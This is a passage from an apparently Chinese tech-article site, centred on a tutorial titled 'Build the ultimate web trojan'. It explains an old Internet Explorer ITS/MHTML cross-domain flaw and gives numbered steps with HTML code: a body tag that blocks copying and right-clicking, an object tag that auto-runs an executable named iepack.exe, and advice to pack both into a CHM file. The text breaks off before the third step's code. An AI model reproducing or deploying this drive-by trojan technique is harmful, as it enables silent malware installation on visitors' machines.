当前位置:首页 » 服务器技术
开发技术指南» 文章正文
    引言:
 

 

    摘要:3.2 像素着色器输入和输出 两样东西要输入到像素着色器:颜色和纹理坐标。两样都是以每像素为单位的。 注意:回想一下,顶点颜色是在图元的面(face of primitive)间进行插值的。 每个像素的纹理坐标就是简单的 (u , v) 坐标,它指定了像素正准备被映射到的纹理的纹理单元。direct3d按每个像素来计算颜色和纹理坐标,从顶点颜色和顶点纹理坐标,在进入像素着色器之前。输入到像素着色器的颜色和纹理坐标的数量依赖于顶点着色器输出的颜色和纹理坐标的......
 ·今天开始学eclipse/swt(1)    »显示摘要«
    摘要:经过一段时间的折腾,终于把eclopse给装上了,并且成功运行java程序,以后为我装的经验。 一般来说,只要把jdk装上了,不需要任何配置就可以使用,但是理想和现实总是存在某种差异, 一下描述了这些差异: 1:计算机必须存在jre环境,jre和jvm的关系是一个是特指,一个是泛指。我的经验是只要计算机上存在jre环境,则不需要设置任何环境变量都可以启动使用eclipse 2:eclipse版本对jsdk的版本有需求,eclipse3.0需要jsdk1.4......


打造终极网页木马,值得一读!
打造终极网页木马,值得一读!

     【相关文章:程序员修炼之路-一个成长了3年的程序员。

    如果你打开此页看到了类似下面的这个程序窗口,那我就“恭喜”你有“洞洞”了^o^ 【扩展阅读:得到本机socket选项的全部默认值。

    闲话少说,立即进入正题。实现起来非常简单,相信稍微懂一点html的人都能手动实现的。 【扩展信息:从MP3中提取歌曲信息

    此漏洞被发现已不是一天两天的事了,考虑到用户的安全等因素,微软以及一些安全组织并没有公开发布此漏洞,只是近日发现网络上有越来越多的利用该漏洞捆绑木马的网页后美国计算机应急响应小组(computer emergency readiness team,简称cert) 才正式公布了微软ie浏览器中存在的一个最新漏洞,目前这一漏洞还没有完善的解决方案,用户即使采取了一定的保护措施仍然不能完全避免该漏洞所带来的危险。利用这一漏洞,入侵者可以欺骗ie浏览器中的infotech storage(its)协议处理器,使之从其它域获取脚本,并获得同目标计算机上本地区域相同的权限。cert指出,入侵者在访问某一网站时通过使用一个特殊的url地址就可以执行上述脚本,从而获得他人的信用卡信息甚至是造成整个网络瘫痪。这一漏洞的工作原理如下:ie浏览器通过its或者mhtml协议来标识一个不能访问或是不存在的mhtml文件;当ie浏览器没 有发现编译完成的html帮助文件(chm)时,its协议处理器就可能会受到欺骗从而访问来自其它域的chm文件。此时入侵者就可以通过对chm文件进行精心设计,使之包含可以从其它域执行的脚本,从而交叉域安全模式也就被入侵者攻破了。

第一步:写一个能够自动运行exe文件的网页,文件内容很简单,如下:

<body onmouseup=document.selection.empty() oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy=document.selection.empty() onselect=document.selection.empty()>

<object id=runit codebase=iepack.exe type=application/x-oleobject height=0 width=0 object>

body标签内进行了一些访问控制,屏蔽了鼠标进行选择、屏蔽鼠标右键、屏蔽鼠标的拖拽操作、防止copy等等。第二个标签是负载exe的代码,通过object标签负载一个二进制文件,注意这里的type类型为"application/x-oleobject",上面的代码在object中加入了一个名为"iepack.exe"的执行文件,如果这时直接打开此html,你就会发现exe文件也神奇的运行起来了,聪明的你是不是已经看出来点什么了?

第二步:将上面的的代码存成文件,暂定为"chm.html",并且把object标签内设定的exe文件与网页放在同一个目录。不要以为这样就能运行了,ie不会主动下载服务器上的执行文件的。当然办法是有的,随便找个chm制作工具,将这个页面与exe文件一并打入chm后打开chm文件你就发现exe也是同样的运行起来了。在这里我推荐用easychm,很好用的。下载地址??~!@#$%^自己用狗狗搜去吧。

第三步:这一步最关键,这也是利用漏洞之所在!

再建立一个htm文件mm.htm,写入以下代码:


...   下一页
    摘要:也谈谈动态绑定dropdownlist(2) 在我的《也谈谈动态绑定dropdownlist(1)》的文章里,(http://blog.csdn.net/zsxfbj/archive/2004/07/08/36659.aspx)提到了的是利用dataset作为数据源来实现dataset的item绑定。但是dataset包含的内容和结构太多,我们只要求的是快速的绑定dropdownlist的item,而不对数据做任何的操作。所以说用dataset做数据源的话......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE